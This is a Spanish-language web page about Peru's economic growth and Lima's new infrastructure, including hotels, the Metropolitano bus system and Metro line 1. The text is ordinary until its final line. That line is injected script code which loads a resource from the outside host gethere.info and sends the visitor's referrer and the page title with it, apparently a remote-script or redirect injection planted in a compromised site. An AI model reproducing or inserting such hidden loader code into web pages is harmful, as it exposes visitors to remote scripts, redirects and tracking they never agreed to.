Image

QUICK CONTACT

[contact-form-7 id="2507" title="quick contact"]

Economía

El crecimiento económico peruano alcanzado en los últimos años, ha significado el desarrollo de nuevas oportunidades para el país. La imagen del Perú es la de un destino sumamente atractivo para diferentes proyectos empresariales. Lima, la capital muestra claras señales de crecimiento y modernidad.

https://www.youtube.com/watch?v=qb87UAiw-i0

 

Espacios públicos más acogedores e infraestructura -hoteles, restaurantes, aeropuerto, terminales- de primer nivel para atender la creciente demanda turística, así como para consolidarse en un dinámico centro de negocios internacionales, son hoy parte del nuevo rostro de Lima.

san-isidro

Se han impulsado proyectos de obras viales e infraestructura para facilitar la conexión de diferentes puntos de la capital. Se ha implementado el Metropolitano, nuevo sistema de buses de transporte público que une el centro de la ciudad con otros distritos. También se ha puesto en operación la línea 1 del Tren Eléctrico de Lima (Metro) y se construirá nuevas líneas que unirán toda la ciudad.

000244303W

metropolitanos.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;